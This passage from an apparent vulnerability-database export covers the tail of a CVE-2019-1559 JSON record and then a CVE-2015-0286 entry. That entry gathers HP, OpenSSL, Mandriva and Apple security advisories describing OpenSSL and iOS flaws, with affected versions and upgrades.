"https://bugzilla.redhat.com/):" }, { "trust": 0.5, "url": "https://access.redhat.com/security/cve/cve-2019-1559" }, { "trust": 0.5, "url": "https://access.redhat.com/security/team/contact/" }, { "trust": 0.4, "url": "https://access.redhat.com/security/team/key/" }, { "trust": 0.4, "url": "https://access.redhat.com/security/updates/classification/#moderate" }, { "trust": 0.3, "url": "https://access.redhat.com/articles/11258" }, { "trust": 0.2, "url": "https://access.redhat.com/articles/2974891" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2018-16881" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-16881" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2019-10072" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2019-0221" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2018-5407" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-5407" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2019-0221" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2019-10072" }, { "trust": 0.1, "url": "https://kc.mcafee.com/corporate/index?page=content\u0026amp;id=sb10282" }, { "trust": 0.1, "url": "https://support.f5.com/csp/article/k18549143?utm_source=f5support\u0026amp;amp;utm_medium=rss" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/203.html" }, { "trust": 0.1, "url": "https://github.com/live-hack-cve/cve-2019-1559" }, { "trust": 0.1, "url": "https://tools.cisco.com/security/center/viewalert.x?alertid=59697" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2019-3888" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2019-3888" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2019-1547" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2019-1563" }, { "trust": 0.1, "url": "https://usn.ubuntu.com/4376-1" }, { "trust": 0.1, "url": "https://usn.ubuntu.com/4376-2" }, { "trust": 0.1, "url": "https://usn.ubuntu.com/usn/usn-3899-1" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.2g-1ubuntu4.15" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl1.0/1.0.2n-1ubuntu6.2" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl1.0/1.0.2n-1ubuntu5.3" }, { "trust": 0.1, "url": "https://access.redhat.com/documentation/en-us/red_hat_jboss_web_server/5.2/" }, { "trust": 0.1, "url": "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/7/html/7.7_release_notes/index" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-0734" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2018-0734" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2019-10160" }, { "trust": 0.1, "url": "https://access.redhat.com/security/updates/classification/#important" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2019-0161" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2018-16838" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2019-10160" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-16838" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2019-0161" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2019-10139" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2019-10139" }, { "trust": 0.1, "url": "https://www.openssl.org/policies/secpolicy.html" } ], "sources": [ { "db": "VULHUB", "id": "VHN-147651" }, { "db": "VULMON", "id": "CVE-2019-1559" }, { "db": "JVNDB", "id": "JVNDB-2019-002098" }, { "db": "PACKETSTORM", "id": "154009" }, { "db": "PACKETSTORM", "id": "158377" }, { "db": "PACKETSTORM", "id": "155413" }, { "db": "PACKETSTORM", "id": "151885" }, { "db": "PACKETSTORM", "id": "155415" }, { "db": "PACKETSTORM", "id": "153932" }, { "db": "PACKETSTORM", "id": "154008" }, { "db": "PACKETSTORM", "id": "169635" }, { "db": "CNNVD", "id": "CNNVD-201902-956" }, { "db": "NVD", "id": "CVE-2019-1559" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "VULHUB", "id": "VHN-147651" }, { "db": "VULMON", "id": "CVE-2019-1559" }, { "db": "JVNDB", "id": "JVNDB-2019-002098" }, { "db": "PACKETSTORM", "id": "154009" }, { "db": "PACKETSTORM", "id": "158377" }, { "db": "PACKETSTORM", "id": "155413" }, { "db": "PACKETSTORM", "id": "151885" }, { "db": "PACKETSTORM", "id": "155415" }, { "db": "PACKETSTORM", "id": "153932" }, { "db": "PACKETSTORM", "id": "154008" }, { "db": "PACKETSTORM", "id": "169635" }, { "db": "CNNVD", "id": "CNNVD-201902-956" }, { "db": "NVD", "id": "CVE-2019-1559" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2019-02-27T00:00:00", "db": "VULHUB", "id": "VHN-147651" }, { "date": "2019-02-27T00:00:00", "db": "VULMON", "id": "CVE-2019-1559" }, { "date": "2019-04-02T00:00:00", "db": "JVNDB", "id": "JVNDB-2019-002098" }, { "date": "2019-08-12T17:13:13", "db": "PACKETSTORM", "id": "154009" }, { "date": "2020-07-09T18:42:27", "db": "PACKETSTORM", "id": "158377" }, { "date": "2019-11-20T20:32:22", "db": "PACKETSTORM", "id": "155413" }, { "date": "2019-02-27T19:19:00", "db": "PACKETSTORM", "id": "151885" }, { "date": "2019-11-20T20:44:44", "db": "PACKETSTORM", "id": "155415" }, { "date": "2019-08-06T21:09:19", "db": "PACKETSTORM", "id": "153932" }, { "date": "2019-08-12T17:13:02", "db": "PACKETSTORM", "id": "154008" }, { "date": "2019-02-26T12:12:12", "db": "PACKETSTORM", "id": "169635" }, { "date": "2019-02-26T00:00:00", "db": "CNNVD", "id": "CNNVD-201902-956" }, { "date": "2019-02-27T23:29:00.277000", "db": "NVD", "id": "CVE-2019-1559" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2022-08-19T00:00:00", "db": "VULHUB", "id": "VHN-147651" }, { "date": "2023-11-07T00:00:00", "db": "VULMON", "id": "CVE-2019-1559" }, { "date": "2021-07-15T06:04:00", "db": "JVNDB", "id": "JVNDB-2019-002098" }, { "date": "2022-03-25T00:00:00", "db": "CNNVD", "id": "CNNVD-201902-956" }, { "date": "2023-11-07T03:08:30.953000", "db": "NVD", "id": "CVE-2019-1559" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "PACKETSTORM", "id": "151885" }, { "db": "PACKETSTORM", "id": "169635" }, { "db": "CNNVD", "id": "CNNVD-201902-956" } ], "trust": 0.8 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "OpenSSL\u00a0 Information Disclosure Vulnerability", "sources": [ { "db": "JVNDB", "id": "JVNDB-2019-002098" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "information disclosure", "sources": [ { "db": "CNNVD", "id": "CNNVD-201902-956" } ], "trust": 0.6 } }
var-201503-0055
Vulnerability from variot
The ASN1_TYPE_cmp function in crypto/asn1/a_type.c in OpenSSL before 0.9.8zf, 1.0.0 before 1.0.0r, 1.0.1 before 1.0.1m, and 1.0.2 before 1.0.2a does not properly perform boolean-type comparisons, which allows remote attackers to cause a denial of service (invalid read operation and application crash) via a crafted X.509 certificate to an endpoint that uses the certificate-verification feature. Supplementary information : CWE Vulnerability type by CWE-17: Code ( code ) Has been identified. OpenSSL is prone to denial-of-service vulnerability. An attacker may exploit this issue to crash the application, resulting in denial-of-service conditions. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c04626468
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c04626468 Version: 1
HPSBGN03306 rev.1 - HP IceWall SSO MCRP, SSO Dfw, and SSO Agent running OpenSSL, Remote Denial of Service (DoS)
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
Release Date: 2015-04-06 Last Updated: 2015-04-06
Potential Security Impact: Remote Denial of Service (DoS)
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY Potential security vulnerabilities have been identified with HP IceWall SSO MCRP, SSO Dfw, and SSO Agent running OpenSSL. The vulnerabilities could be exploited remotely resulting in Denial of Service (DoS).
References:
CVE-2015-0209 CVE-2015-0286 CVE-2015-0287 CVE-2015-0288 CVE-2015-0289 SSRT102007
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP IceWall MCRP version 2.1, 2.1 SP1, 2.1 SP2, and 3.0 HP IceWall SSO Dfw version 8.0, 8.0 R1, 8.0 R2, 8.0 R3, and 10.0 HP IceWall SSO Agent version 8.0 and 8.0 2007 Update Release 2
BACKGROUND
CVSS 2.0 Base Metrics
Reference Base Vector Base Score CVE-2015-0209 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8 CVE-2015-0286 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2015-0287 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2015-0288 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2015-0289 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP recommends the following software updates or workarounds to resolve the vulnerabilities for HP IceWall SSO MCRP, SSO Dfw, and SSO Agent.
Workaround for HP IceWall SSO MCRP:
- If possible, do not use the CLIENT_CERT and CLIENT_CERTKEY settings in
the host configuration file. Not setting these will prevent MCRP from using those client certificates for communicating with the back-end web servers.
- If the CLIENT_CERT and CLIENT_CERTKEY settings must be used, then there
is no workaround other than applying a vendor patch for OpenSSL for these vulnerabilities.
Workaround for HP IceWall SSO Dfw and SSO Agent:
- If possible, do not use client certificates for SSL communication
between the client and server which are running HP IceWall SSO Dfw or SSO Agent.
- If client certificates for SSL communication between the client and
server must be used, then there is no workaround other than applying a vendor patch for OpenSSL for these vulnerabilities.
Software updates to resolve the vulnerabilities for OpenSSL:
-
IceWall SSO Dfw 10.0 running on RHEL could be using either the OS bundled OpenSSL library or the OpenSSL bundled with HP IceWall. If still using the OpenSSL bundled with HP IceWall, please switch to the OpenSSL library bundled with the OS, and then follow the instructions in step 3.
Documents are available at the following location with instructions to switch to the OS bundled OpenSSL library:
http://www.hp.com/jp/icewall_patchaccess
- For IceWall SSO Dfw 8.0, 8.0 R1, 8.0 R2, 8.0 R3 which bundle OpenSSL, please download the updated OpenSSL at the following location:
http://www.hp.com/jp/icewall_patchaccess
- For IceWall products running on HP-UX which are using the OS bundled OpenSSL, please apply the HP-UX OpenSSL update for openssl-0.9.8zf when it is available from the following location:
https://h20392.www2.hp.com/portal/swdepot/displayInstallInfo.do?product Number=OPENSSL11I
Note: The HP IceWall product is only available in Japan.
HISTORY Version:1 (rev.1) - 6 April 2015 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com.
Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com
Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins
Security Bulletin Archive: A list of recently released Security Bulletins is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/
Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.
3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX
Copyright 2015 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. OpenSSL Security Advisory [19 Mar 2015] =======================================
OpenSSL 1.0.2 ClientHello sigalgs DoS (CVE-2015-0291)
Severity: High
If a client connects to an OpenSSL 1.0.2 server and renegotiates with an invalid signature algorithms extension a NULL pointer dereference will occur. This can be exploited in a DoS attack against the server.
This issue was was reported to OpenSSL on 26th February 2015 by David Ramos of Stanford University. The fix was developed by Stephen Henson and Matt Caswell of the OpenSSL development team.
Reclassified: RSA silently downgrades to EXPORT_RSA [Client] (CVE-2015-0204)
Severity: High
This security issue was previously announced by the OpenSSL project and classified as "low" severity. This severity rating has now been changed to "high".
This was classified low because it was originally thought that server RSA export ciphersuite support was rare: a client was only vulnerable to a MITM attack against a server which supports an RSA export ciphersuite. Recent studies have shown that RSA export ciphersuites support is far more common.
OpenSSL 1.0.1 users should upgrade to 1.0.1k. OpenSSL 1.0.0 users should upgrade to 1.0.0p. OpenSSL 0.9.8 users should upgrade to 0.9.8zd.
This issue was reported to OpenSSL on 22nd October 2014 by Karthikeyan Bhargavan of the PROSECCO team at INRIA. The fix was developed by Stephen Henson of the OpenSSL core team. It was previously announced in the OpenSSL security advisory on 8th January 2015.
Multiblock corrupted pointer (CVE-2015-0290)
Severity: Moderate
OpenSSL 1.0.2 introduced the "multiblock" performance improvement. This feature only applies on 64 bit x86 architecture platforms that support AES NI instructions. A defect in the implementation of "multiblock" can cause OpenSSL's internal write buffer to become incorrectly set to NULL when using non-blocking IO. Typically, when the user application is using a socket BIO for writing, this will only result in a failed connection. However if some other BIO is used then it is likely that a segmentation fault will be triggered, thus enabling a potential DoS attack.
This issue was reported to OpenSSL on 13th February 2015 by Daniel Danner and Rainer Mueller. The fix was developed by Matt Caswell of the OpenSSL development team.
Segmentation fault in DTLSv1_listen (CVE-2015-0207)
Severity: Moderate
The DTLSv1_listen function is intended to be stateless and processes the initial ClientHello from many peers. It is common for user code to loop over the call to DTLSv1_listen until a valid ClientHello is received with an associated cookie. A defect in the implementation of DTLSv1_listen means that state is preserved in the SSL object from one invocation to the next that can lead to a segmentation fault. Errors processing the initial ClientHello can trigger this scenario. An example of such an error could be that a DTLS1.0 only client is attempting to connect to a DTLS1.2 only server.
This issue was reported to OpenSSL on 27th January 2015 by Per Allansson. The fix was developed by Matt Caswell of the OpenSSL development team.
Segmentation fault in ASN1_TYPE_cmp (CVE-2015-0286)
Severity: Moderate
The function ASN1_TYPE_cmp will crash with an invalid read if an attempt is made to compare ASN.1 boolean types. Since ASN1_TYPE_cmp is used to check certificate signature algorithm consistency this can be used to crash any certificate verification operation and exploited in a DoS attack. Any application which performs certificate verification is vulnerable including OpenSSL clients and servers which enable client authentication.
OpenSSL 1.0.2 users should upgrade to 1.0.2a OpenSSL 1.0.1 users should upgrade to 1.0.1m. OpenSSL 1.0.0 users should upgrade to 1.0.0r. OpenSSL 0.9.8 users should upgrade to 0.9.8zf.
This issue was discovered and fixed by Stephen Henson of the OpenSSL development team.
Segmentation fault for invalid PSS parameters (CVE-2015-0208)
Severity: Moderate
The signature verification routines will crash with a NULL pointer dereference if presented with an ASN.1 signature using the RSA PSS algorithm and invalid parameters. Since these routines are used to verify certificate signature algorithms this can be used to crash any certificate verification operation and exploited in a DoS attack. Any application which performs certificate verification is vulnerable including OpenSSL clients and servers which enable client authentication.
This issue affects OpenSSL version: 1.0.2
OpenSSL 1.0.2 users should upgrade to 1.0.2a
This issue was was reported to OpenSSL on 31st January 2015 by Brian Carpenter and a fix developed by Stephen Henson of the OpenSSL development team.
ASN.1 structure reuse memory corruption (CVE-2015-0287)
Severity: Moderate
Reusing a structure in ASN.1 parsing may allow an attacker to cause memory corruption via an invalid write. Such reuse is and has been strongly discouraged and is believed to be rare.
Applications that parse structures containing CHOICE or ANY DEFINED BY components may be affected. Certificate parsing (d2i_X509 and related functions) are however not affected. OpenSSL clients and servers are not affected.
OpenSSL 1.0.2 users should upgrade to 1.0.2a OpenSSL 1.0.1 users should upgrade to 1.0.1m. OpenSSL 1.0.0 users should upgrade to 1.0.0r. OpenSSL 0.9.8 users should upgrade to 0.9.8zf.
This issue was discovered by Emilia Käsper and a fix developed by Stephen Henson of the OpenSSL development team.
PKCS7 NULL pointer dereferences (CVE-2015-0289)
Severity: Moderate
The PKCS#7 parsing code does not handle missing outer ContentInfo correctly. An attacker can craft malformed ASN.1-encoded PKCS#7 blobs with missing content and trigger a NULL pointer dereference on parsing.
Applications that verify PKCS#7 signatures, decrypt PKCS#7 data or otherwise parse PKCS#7 structures from untrusted sources are affected. OpenSSL clients and servers are not affected.
OpenSSL 1.0.2 users should upgrade to 1.0.2a OpenSSL 1.0.1 users should upgrade to 1.0.1m. OpenSSL 1.0.0 users should upgrade to 1.0.0r. OpenSSL 0.9.8 users should upgrade to 0.9.8zf.
This issue was reported to OpenSSL on February 16th 2015 by Michal Zalewski (Google) and a fix developed by Emilia Käsper of the OpenSSL development team.
Base64 decode (CVE-2015-0292)
Severity: Moderate
A vulnerability existed in previous versions of OpenSSL related to the processing of base64 encoded data. Any code path that reads base64 data from an untrusted source could be affected (such as the PEM processing routines). Maliciously crafted base 64 data could trigger a segmenation fault or memory corruption.
OpenSSL 1.0.1 users should upgrade to 1.0.1h. OpenSSL 1.0.0 users should upgrade to 1.0.0m. OpenSSL 0.9.8 users should upgrade to 0.9.8za. This issue was originally reported by Robert Dugal and subsequently by David Ramos.
DoS via reachable assert in SSLv2 servers (CVE-2015-0293)
Severity: Moderate
A malicious client can trigger an OPENSSL_assert (i.e., an abort) in servers that both support SSLv2 and enable export cipher suites by sending a specially crafted SSLv2 CLIENT-MASTER-KEY message.
OpenSSL 1.0.2 users should upgrade to 1.0.2a OpenSSL 1.0.1 users should upgrade to 1.0.1m. OpenSSL 1.0.0 users should upgrade to 1.0.0r. OpenSSL 0.9.8 users should upgrade to 0.9.8zf.
This issue was discovered by Sean Burford (Google) and Emilia Käsper (OpenSSL development team) in March 2015 and the fix was developed by Emilia Käsper.
Empty CKE with client auth and DHE (CVE-2015-1787)
Severity: Moderate
If client auth is used then a server can seg fault in the event of a DHE ciphersuite being selected and a zero length ClientKeyExchange message being sent by the client. This could be exploited in a DoS attack.
This issue was discovered and the fix was developed by Matt Caswell of the OpenSSL development team.
Handshake with unseeded PRNG (CVE-2015-0285)
Severity: Low
Under certain conditions an OpenSSL 1.0.2 client can complete a handshake with an unseeded PRNG. The conditions are: - The client is on a platform where the PRNG has not been seeded automatically, and the user has not seeded manually - A protocol specific client method version has been used (i.e. not SSL_client_methodv23) - A ciphersuite is used that does not require additional random data from the PRNG beyond the initial ClientHello client random (e.g. PSK-RC4-SHA).
If the handshake succeeds then the client random that has been used will have been generated from a PRNG with insufficient entropy and therefore the output may be predictable.
For example using the following command with an unseeded openssl will succeed on an unpatched platform:
openssl s_client -psk 1a2b3c4d -tls1_2 -cipher PSK-RC4-SHA
This issue affects OpenSSL version: 1.0.2
OpenSSL 1.0.2 users should upgrade to 1.0.2a.
This issue was discovered and the fix was developed by Matt Caswell of the OpenSSL development team.
Use After Free following d2i_ECPrivatekey error (CVE-2015-0209)
Severity: Low
A malformed EC private key file consumed via the d2i_ECPrivateKey function could cause a use after free condition. This, in turn, could cause a double free in several private key parsing functions (such as d2i_PrivateKey or EVP_PKCS82PKEY) and could lead to a DoS attack or memory corruption for applications that receive EC private keys from untrusted sources. This scenario is considered rare.
OpenSSL 1.0.2 users should upgrade to 1.0.2a OpenSSL 1.0.1 users should upgrade to 1.0.1m. OpenSSL 1.0.0 users should upgrade to 1.0.0r. OpenSSL 0.9.8 users should upgrade to 0.9.8zf.
This issue was discovered by the BoringSSL project and fixed in their commit 517073cd4b. The OpenSSL fix was developed by Matt Caswell of the OpenSSL development team.
X509_to_X509_REQ NULL pointer deref (CVE-2015-0288)
Severity: Low
The function X509_to_X509_REQ will crash with a NULL pointer dereference if the certificate key is invalid. This function is rarely used in practice.
OpenSSL 1.0.2 users should upgrade to 1.0.2a OpenSSL 1.0.1 users should upgrade to 1.0.1m. OpenSSL 1.0.0 users should upgrade to 1.0.0r. OpenSSL 0.9.8 users should upgrade to 0.9.8zf.
This issue was discovered by Brian Carpenter and a fix developed by Stephen Henson of the OpenSSL development team.
Note
As per our previous announcements and our Release Strategy (https://www.openssl.org/about/releasestrat.html), support for OpenSSL versions 1.0.0 and 0.9.8 will cease on 31st December 2015. No security updates for these releases will be provided after that date. Users of these releases are advised to upgrade.
References
URL for this Security Advisory: https://www.openssl.org/news/secadv_20150319.txt
Note: the online version of the advisory may be updated with additional details over time.
For details of OpenSSL severity classifications please see: https://www.openssl.org/about/secpolicy.html
. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
Mandriva Linux Security Advisory MDVSA-2015:062 http://www.mandriva.com/en/support/security/
Package : openssl Date : March 27, 2015 Affected: Business Server 2.0
Problem Description:
Multiple vulnerabilities has been discovered and corrected in openssl:
Race condition in the ssl3_read_bytes function in s3_pkt.c in OpenSSL through 1.0.1g, when SSL_MODE_RELEASE_BUFFERS is enabled, allows remote attackers to inject data across sessions or cause a denial of service (use-after-free and parsing error) via an SSL connection in a multithreaded environment (CVE-2010-5298).
The Montgomery ladder implementation in OpenSSL through 1.0.0l does not ensure that certain swap operations have a constant-time behavior, which makes it easier for local users to obtain ECDSA nonces via a FLUSH+RELOAD cache side-channel attack (CVE-2014-0076).
The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug (CVE-2014-0160).
OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h does not properly restrict processing of ChangeCipherSpec messages, which allows man-in-the-middle attackers to trigger use of a zero-length master key in certain OpenSSL-to-OpenSSL communications, and consequently hijack sessions or obtain sensitive information, via a crafted TLS handshake, aka the CCS Injection vulnerability (CVE-2014-0224).
The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other products, uses nondeterministic CBC padding, which makes it easier for man-in-the-middle attackers to obtain cleartext data via a padding-oracle attack, aka the POODLE issue (CVE-2014-3566).
The BN_sqr implementation in OpenSSL before 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k does not properly calculate the square of a BIGNUM value, which might make it easier for remote attackers to defeat cryptographic protection mechanisms via unspecified vectors, related to crypto/bn/asm/mips.pl, crypto/bn/asm/x86_64-gcc.c, and crypto/bn/bn_asm.c (CVE-2014-3570).
The ssl3_get_key_exchange function in s3_clnt.c in OpenSSL before 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k allows remote SSL servers to conduct ECDHE-to-ECDH downgrade attacks and trigger a loss of forward secrecy by omitting the ServerKeyExchange message (CVE-2014-3572).
The ssl3_get_key_exchange function in s3_clnt.c in OpenSSL before 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k allows remote SSL servers to conduct RSA-to-EXPORT_RSA downgrade attacks and facilitate brute-force decryption by offering a weak ephemeral RSA key in a noncompliant role, related to the FREAK issue. NOTE: the scope of this CVE is only client code based on OpenSSL, not EXPORT_RSA issues associated with servers or other TLS implementations (CVE-2015-0204).
The ssl3_get_cert_verify function in s3_srvr.c in OpenSSL 1.0.0 before 1.0.0p and 1.0.1 before 1.0.1k accepts client authentication with a Diffie-Hellman (DH) certificate without requiring a CertificateVerify message, which allows remote attackers to obtain access without knowledge of a private key via crafted TLS Handshake Protocol traffic to a server that recognizes a Certification Authority with DH support (CVE-2015-0205).
The updated packages have been upgraded to the 1.0.1m version where these security flaws has been fixed.
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-5298 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0076 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0195 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0198 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0221 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3470 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3513 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3567 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3569 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3570 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3571 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3572 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8275 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0204 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0205 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0206 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0209 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0286 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0287 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0288 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0289 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0293 http://openssl.org/news/secadv_20150108.txt http://openssl.org/news/secadv_20150319.txt
Updated Packages:
Mandriva Business Server 2/X86_64: 324a85f7e1165ab02881e44dbddaf599 mbs2/x86_64/lib64openssl1.0.0-1.0.1m-1.mbs2.x86_64.rpm 9c0bfb6ebd43cb6d81872abf71b4f85f mbs2/x86_64/lib64openssl-devel-1.0.1m-1.mbs2.x86_64.rpm 58df54e72ca7270210c7d8dd23df402b mbs2/x86_64/lib64openssl-engines1.0.0-1.0.1m-1.mbs2.x86_64.rpm b5313ffb5baaa65aea05eb05486d309a mbs2/x86_64/lib64openssl-static-devel-1.0.1m-1.mbs2.x86_64.rpm a9890ce4c33630cb9e00f3b2910dd784 mbs2/x86_64/openssl-1.0.1m-1.mbs2.x86_64.rpm 521297a5fe26e2de0c1222d8d03382d1 mbs2/SRPMS/openssl-1.0.1m-1.mbs2.src.rpm
To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
APPLE-SA-2015-09-16-1 iOS 9
iOS 9 is now available and addresses the following:
Apple Pay Available for: iPhone 6, iPad mini 3, and iPad Air 2 Impact: Some cards may allow a terminal to retrieve limited recent transaction information when making a payment Description: The transaction log functionality was enabled in certain configurations. This issue was addressed by removing the transaction log functionality. CVE-ID CVE-2015-5916
AppleKeyStore Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: A local attacker may be able to reset failed passcode attempts with an iOS backup Description: An issue existed in resetting failed passcode attempts with a backup of the iOS device. This was addressed through improved passcode failure logic. CVE-ID CVE-2015-5850 : an anonymous researcher
Application Store Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: Clicking a malicious ITMS link may lead to a denial of service in an enterprise-signed application Description: An issue existed with installation through ITMS links. This was addressed through additional installation verification. CVE-ID CVE-2015-5856 : Zhaofeng Chen, Hui Xue, and Tao (Lenx) Wei of FireEye, Inc.
Audio Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: Playing a malicious audio file may lead to an unexpected application termination Description: A memory corruption issue existed in the handling of audio files. This issue issue was addressed through improved memory handling. CVE-ID CVE-2015-5862 : YoungJin Yoon of Information Security Lab. (Adv.: Prof. Taekyoung Kwon), Yonsei University, Seoul, Korea
Certificate Trust Policy Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: Update to the certificate trust policy Description: The certificate trust policy was updated. The complete list of certificates may be viewed at https://support.apple.com/en- us/HT204132.
